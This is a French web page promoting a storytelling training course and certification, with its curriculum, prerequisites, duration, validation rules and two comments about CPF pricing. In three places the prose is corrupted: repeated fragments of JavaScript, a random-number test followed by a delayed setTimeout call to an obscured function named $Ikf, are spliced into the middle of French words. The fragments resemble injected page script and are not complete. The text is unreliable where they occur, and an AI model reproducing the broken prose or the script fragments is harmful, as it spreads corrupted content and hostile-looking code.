Les cours de storytelling

Le storytelling ou l’art de raconter une histoire pour un roman, une nouvelle, un scénario, une BD ou un blog.

COMMENT RACONTER UNE HISTOIRE ?

Chez Studio Capitale Enseignement, l’enseignement du storytelling consiste en l’apprentissage des techniques nécessaires pour imaginer et rédiger votre histoire.

Quel que soit le genre, que ce soit un roman, une nouvelle, un scénario, une BD, un article de blog (voire la promotion d’un produit, d’une personne, d’une société…), il vous faudra inventer, concevoir, mais aussi élaborer une structure pour bien mettre en forme le contenu de l’histoire que vous imaginerez. La narration est la mise en forme du contenu de votre histoire. Il faut donc élaborer une structure narrative, à l’image du plan en architecture. Ceci implique que vous inventiez et que vous conceviez préalablement le contenu de votre histoire pour la structurer.

Pourquoi ? Parce que dans « raconter » il y a « conter ». Un conte comporte un début, un milieu, une fin (même si vous décidez que ces trois étapes ne seront dans cet ordre chronologique). Structurer évite donc de partir dans tous les sens. Ainsi, vous ne perdrez pas votre sujet en route, parce que vous l’aurez bien cerné au départ ! Ceci évite que votre histoire reste un magma informe, un amas d’idées ou de fictions obscures pourtant pleines de belles intentions au départ. Bref vous devez donner une unité à votre récit, à votre fiction, à votre article.

Storytelling

Ce qui revient tout d’abord à se poser trois questions simples :
1/ Qu’est-ce ce que je veux dire ?
2/ De quoi je parle ?
3/ A qui je m’adresse ?

Vos intentions, votre sujet, et votre « cible », le « qui » ; sont les trois enjeux qui vous permettent de ne jamais perdre le fil de votre histoire. Quelque chose du genre : « Où j’en étais moi, déjà… ? » ; « Je parlais de quoi déjà ? » ; « A ma petite sœur ? ». Vous garderez ainsi la maîtrise de l’histoire durant tout le déroulement de l’écriture. Bien sûr, il aura fallu l’inventer et peut-être ne la découvrirez-vous qu’au fur et à mesure.

(Mais nous sommes là pour vous former, vous transmettre nos connaissances en la matière et surtout… vous soutenir !)

C’est normal cela s’appelle un brouillon ! Ou une version… Ou mieux encore : « le work in progress ». C’est-à-dire ces étapes successives d’écriture qui vous font progresser au fur et à mesure dans l’écriture de votre histoire. Grâce au cadre que vous aurez préalablement établi, rien ne vous empêchera de laisser galoper votre imagination et votre sens de l’improvisation. Et aussi paradoxal que cela puisse paraître votre inspiration courra d’autant plus librement à l’intérieur de ce cadre : la structure narrative.

Quels sont les buts de cet enseignement du storytelling ?

Répondre aux « comments » : comment je m’y prends pour raconter une histoire ? Comment vais-je m’exprimer… ? Mais aussi de définir le « pourquoi » : pourquoi je dis ça ? Pourquoi je parle de ça … ?

Tout ceci pour vous permettre de raconter, d’inventer ; de divertir autant qu’instruire ; de conseiller, argumenter, convaincre… De plaire, distraire ou séduire ; de surprendre, captiver ou émouvoir ; de transmettre des idées, de tenir un discours, de faire rire ou pleurer votre public.

En deux mots : communiquer et échanger avec vos lecteurs !

Dans le but d’être lu, « partagé », « commenté », « liké », et le cas échéant, de vous faire buzzer sur les réseaux sociaux, d’être acheté chez les libraires ou lu sur les tablettes de lecture, voire d’être écouté sur les podcasts !

Storytelling

Résultat, vous provoquerez :

  • Emotion
  • Mémorisation
  • Confiance
  • Fidélité

Il y aura de l’émotion dans vos histoires, suscitant la mémorisation : vos lecteurs se souviendront de vous ; et vous provoquerez un intérêt renouvelé et impatient par la confiance que vos lecteurs ont en vous et qui les rendra fidèles.

Cette formation s’adresse aussi bien aux débutants, qu’aux intermédiaires et aux avancés, notre professeur s’adapte à tous les niveaux.

 

Diplôme d’établissement de storytelling – Raconter une histoire pour promouvoir un projet

L’objectif est d’imaginer et construire une histoire captivante pour être capable de promouvoir une idée, un produit ou un projet de manière divertissante et novatrice. 

Au coeur de la nécessité actuelle de convaincre, vendre et se vendre, capter l’attention d’un public, se faire connaître et face à la décroissance des techniques commerciales, politiques ou marketing usuelles, un nouveau moyen de communication est né : le storytelling.  Cependant, son développement actuel proéminant fait surgir une demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande nouvelle en qualité de production : les histoires doivent être racontées correctement et être pertinentes par rapport au projet pour toucher le public visé.  De fait, au vu de la multiplication des campagnes marketing, commerciales fondées sur le storytelling, il faut maintenant être très performant et savoir réellement raconter une histoire, pertinente selon l’objectif, ce qui n’est pas donné à tous. Les campagnes publicitaires, politiques ou commerciales ont besoin de personnes formées et efficaces car les délais sont souvent courts.

Ce diplôme d’établissement s’articule autour de quatre composantes principales :

 

Clarifier son projet, le structurer :

  • Structurer son récit (l’épine dorsale) selon son objectif commercial afin de susciter l’intérêt et l’engagement de ses lecteurs.
  • Utiliser une structure (introduction, contexte, idées principales, implications, conclusions) pour entretenir l’attention afin de transmettre le message efficacement.
  • Susciter l’intérêt en se concentrant sur une question auquel il faut répondre ou bien une expérience à partager afin d’engager la concentration du lecteur.
  • Étoffer ses arguments à l’aide d’exemples, anecdotes et faits réels afin de les rendre crédibles et de les situer dans un contexte.
  • Éveiller la curiosité en intriguant sans dire la solution afin de créer un suspense.

 

Écrire du contenu selon son objectif commercial afin d’engager ses auditeurs en utilisant une grammaire, orthographe et typographie sans fautes

  • Ecrire sans faute de grammaire ou d’orthographe en utilisant systématiquement les fonctions de correction des traitements de texte.
  • Contrôler la typographie et la qualité du style par un logiciel spécialisé. Par qualité du style, on entend : longueur des phrases, répétitions, mauvais vocabulaire, mot inadapté au contexte, etc.
  • Choisir ses mots avec vérité, en étant soi-même, sans chercher à fabriquer artificiellement afin que le lecteur sente l’authenticité et la sincérité d’un auteur qui parle comme à un proche.
  • Se relire toujours plusieurs fois afin de corriger les fautes mais aussi de raccourcir les phrases trop longues.
  • Actualiser la forme et le fond afin de suivre les tendances en exerçant une veille des newsletters et des maîtres du storytelling.
  • Lire des livres, regarder des films et analyser le pourquoi et le comment de ce qui fonctionne en terme de style et de structure afin d’alimenter son inspiration en assimilant les techniques et l’imaginaire de son époque.

 

Finaliser son histoire, synthétiser son récit

  • Décrire une histoire en une phrase ou deux pour clarifier l’idée du récit et du thème.
  • « Pitcher » pour extraire l’argumentaire commercial de son récit et trouver un titre accrocheur.
  • Communiquer avec sincérité et émotion afin de créer une communauté en employant un ton personnel et authentique.
  • Parler de son expérience personnelle avec sincérité, honnêteté afin d’instaurer la confiance en employant parfois l’autodérision et sans cacher ses faiblesses, ses erreurs.
  • Transmettre de l’émotion afin de toucher son audience en exprimant son ressenti sans fausse pudeur.
  • Analyser les valeurs qui sont associées à sa marque et recherche les histoires qui véhiculent ces valeurs afin de les transmettre par association en les racontant sous l’angle de la similitude.
  • Sensibiliser aux valeurs de sa marque afin de créer une adhésion de sa communauté par une forte identité.
  • Utiliser l’humour pour capter l’attention du lecteur et faire passer une idée en préparant des petites phrases.
  • Utiliser le pouvoir de la vulnérabilité pour développer de la sympathie et de l’empathie chez le lecteur afin de créer une relation plus personnelle.
  • Utiliser l’auto-dérision pour briser la glace et les à priori que le lecteur peut avoir

 

Construire son marketing sur de la valeur afin d’engager et de fidéliser autour de sa marque en donnant des conseils ou témoignages d’expert

  • Expliquer comment réaliser une action en se positionnant comme expert afin d’intéresser en valorisant sa compétence.
  • Répondre aux questions et animer sa communauté par la veille sur les réseaux sociaux.
  • Ecrire une newsletter régulière qui donne une information ou un témoignage utile et se termine par une question afin d’engager la communauté.
storytelling

Public – PRÉ-REQUIS de la formation

Doit maitriser le français à l’écrit.

S’adresse à tout public qui possède des aptitudes à l’écriture, des notions de marketing et de communication. 
S’adresse plus particulièrement aux entrepreneurs. Et aussi aux RH, aux responsables marketing ou communication, aux association humanitaires et à tous ceux qui doivent défendre un projet et convaincre : ingénieurs, inventeurs, demandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andeurs d’emploi, commerçants…
Validation par entretien et test écrit.
Entretien : motivations, connaissances, expériences 
Test écrit : orthographe, grammaire, style

Méthode pédagogique

Adapté au profil de l’apprenant.

Soit apprendre à partir de sujets donnés par le formateur.

Soit apprendre en développant les projets de l’apprenant.

Le travail à lieu pendant la session et entre les sessions.

Il s’agit de rédiger des cas réels de storytelling pour des secteurs diversifiés.

Durée et détails pratiques

Les formations sont à entrée sortie permanente toute l’année.

La durée varie selon le niveau de départ de l’apprenant.

La durée recommandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andée est de trente heures avec évaluation par le formateur toutes les dix heures.

La sensibilité des auteurs fait que nous ne gardons généralement pas les écrits sauf ceux qui concernent le dossier de la certification.

Les éléments du dossier de la certification sont détruits ou rendus après délibération du jury.

Ne sont présentés au jury de la certification que les apprenant qui ont été présélectionnés par le formateur.

Validation partielle

Notre établissement autorise les validations partielles mais pas France Compétence.

Par conséquent, nos validations partielles ne sont pas certifiées par l’état et ne sont valables qu’au niveau privé.

Débouchés professionnels

Nos formations et notre certification valident une compétence et non-pas un métier.

Par conséquent, elle ne peuvent pas, à elles seules, garantir un emploi.

Ce sont soit des développement de compétences transversales,

soit l’ouverture vers des options de spécialisation complémentaires au métier de base de l’apprenant.

Ce sont des atouts professionnels qui aident au développement sans se substituer au métier de base de l’apprenant.

2 Comments

  • Stephane dit :

    Bonjour

    Nos formations sont personnalisées et peuvent se faire en plusieurs fois.
    C’est la raison pour laquelle il y a tant de budgets différents.
    900€ vous permet de financer 15h de cours particuliers.
    Pour les renseignements sur le storytelling, info.studcap@gmail.com et 07 82 99 78 60

    A bientôt

  • Hanane dit :

    Bonjour, sur le site CPF, j’ai remarqué votre formation avec plusieurs packages (3h 5h 6h 7h 9h 10h 11h etc…). Quelle est la différence svp ? Je travaille dans le social média et j’aimerais me former sur le story telling pour augmenter l’impact de mes posts. Quelle package me proposez-vous (je dispose d’environ 900€ de crédit CPF). Merci !

Laissez votre réponse

 

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.